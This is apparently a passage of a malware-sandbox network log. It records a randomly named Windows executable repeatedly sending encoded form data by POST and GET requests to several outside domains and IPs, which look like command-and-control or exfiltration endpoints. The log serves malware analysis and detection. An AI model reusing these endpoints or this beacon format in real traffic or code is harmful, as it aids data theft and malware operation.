                                                                                                                          Nov 22, 2024 15:13:19.533786058 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:19 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Nov 22, 2024 15:13:19.533951044 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          18 | 192.168.2.4 | 49936 | 161.97.142.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:20.880209923 CET | 644 | OUT | POST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0PG0lUo79+e+/V9C4cFy3deMZyeLparcrA7uKD7RQ145YdYnFEaLTUd7FNKvYJ719nHZd5LouFmNLWrnRHWJ6+e51fRnof6GbxNdz2VLSKhYi5iGNzLoSoJ9m87w0gq7T8AEPIn+ZtoLx05U0G7oRjjtko0ezjPZAB02iOmR38xE1o=
                                                                                                                          Nov 22, 2024 15:13:22.157048941 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:21 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Nov 22, 2024 15:13:22.157167912 CET | 370 | IN


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          19 | 192.168.2.4 | 49944 | 161.97.142.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:23.551826000 CET | 10726 | OUT | POST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=[TRUNCATED]
                                                                                                                          Nov 22, 2024 15:13:24.852082968 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:24 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Nov 22, 2024 15:13:24.852154016 CET | 370 | IN


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          20 | 192.168.2.4 | 49951 | 161.97.142.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:26.245233059 CET | 356 | OUT | GET /6m2n/?Mr60=Yw5byyKwEzNx0WExUgXfy9WYeOrLRKTUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0orZ4vi8yKWUq5FVUlLJ03fvmQMl+mrBpOPM=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:27.623074055 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:27 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 2966
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: "66cce1df-b96"
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:13:27.623101950 CET | 1236 | IN
                                                                                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                          Nov 22, 2024 15:13:27.623114109 CET | 698 | IN
                                                                                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          21 | 192.168.2.4 | 49969 | 35.220.176.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:33.694235086 CET | 633 | OUT | POST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=DHQJ2ukrMYiDcrLT94GXRtKgvI/v0mxxmPCmHwfYryxnd1ycnGEQEOD9uEpj2+pMGjAsbkDfwmIOKyneJhrZj/4aT29/7aB88NqUNqHjyY6gcdf5xE25uQK5nXh0Ph5tsPZXSdTZzvrALNPhObET+gp0y1uvS7PogQU5G6597fAJmGbgfv8U9lPL2yp8DFj9WA==
                                                                                                                          Nov 22, 2024 15:13:35.226351976 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:34 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          22 | 192.168.2.4 | 49975 | 35.220.176.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:36.365066051 CET | 653 | OUT | POST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHBneQOcmEsQNeD9hkpm4epTGjMkbh7fwnsOKw/eVCTYiv4YeW9hmKB88NqUNqTJyYigfsv5xl2+jwK+gXh0Lh5psPZ5Sce0ztTALJfhOp8QlQp28Vu/SYqH6xZmNYRA4fQ9nAW6OedDvlr4r1gIOGe0NIBgaTTdMYmb3SBI9crrp7k=
                                                                                                                          Nov 22, 2024 15:13:37.935635090 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:37 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          23 | 192.168.2.4 | 49981 | 35.220.176.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:39.033026934 CET | 10735 | OUT | POST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:40.565495014 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:40 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          24 | 192.168.2.4 | 49989 | 35.220.176.144 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:41.686280012 CET | 359 | OUT | GET /7yhf/?Mr60=OF4p1YkyIdfCe7eI49mlQK2eqaOY0Xp5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGru88xTxROuotR+L2zC6/y25G8bNDJ7z2wjg0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:43.188049078 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:42 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          25 | 192.168.2.4 | 50007 | 101.35.209.183 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:49.356738091 CET | 624 | OUT | POST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeJu4/vNTnVh5iPnW9U7b3dIGcFWeASvH7AA==
                                                                                                                          Nov 22, 2024 15:13:50.825798035 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:50 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          26 | 192.168.2.4 | 50013 | 101.35.209.183 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:52.126336098 CET | 644 | OUT | POST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPIivYRX0fs6ybAjbHhx+Ykd+HLR6bYgmBMA=
                                                                                                                          Nov 22, 2024 15:13:53.593094110 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:53 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          27 | 192.168.2.4 | 50019 | 101.35.209.183 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:54.894814014 CET | 10726 | OUT | POST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          28 | 192.168.2.4 | 50026 | 101.35.209.183 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:13:57.544239998 CET | 356 | OUT | GET /wu7k/?Mr60=msE8We8dGqsfRntVyauP2sAWp39/EoG83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP4o7T3EWu90E9kOVVHAZEZpi4QiZXp0u9yLs=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:02.130707026 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:01 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50036 | 108.181.189.7 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:07.625039101 CET | 624 | OUT | POST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk2+gwcEbbCBVIfP7OwBvnRIiA8Ih36oAorw==
Nov 22, 2024 15:14:08.862458944 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:08 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close
Nov 22, 2024 15:14:08.863389969 CET | 713 | IN | [continuation of the chunked, gzip-encoded response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50037 | 108.181.189.7 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:10.286286116 CET | 644 | OUT | POST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDIGzhPoD3r9hw177RU3XJg39F/jKSiRMI6A=
Nov 22, 2024 15:14:11.689364910 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:11 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close
Nov 22, 2024 15:14:11.689763069 CET | 713 | IN | [continuation of the chunked, gzip-encoded response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50038 | 108.181.189.7 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:12.959923029 CET | 10726 | OUT | POST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Data Ascii: Mr60= [TRUNCATED]
Nov 22, 2024 15:14:14.752383947 CET | 992 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:13 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50039 | 108.181.189.7 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:15.626375914 CET | 356 | OUT | GET /ykgd/?Mr60=9oLAy+SEg8JXgI2QYoJQeX3wYK8lZLg7WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/2tLKee7xpwwT0pkaI3y+yn0sIY/GpO9ikGE=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:14:17.012893915 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-length: 1249
                                                                                                                          date: Fri, 22 Nov 2024 14:14:16 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          connection: close
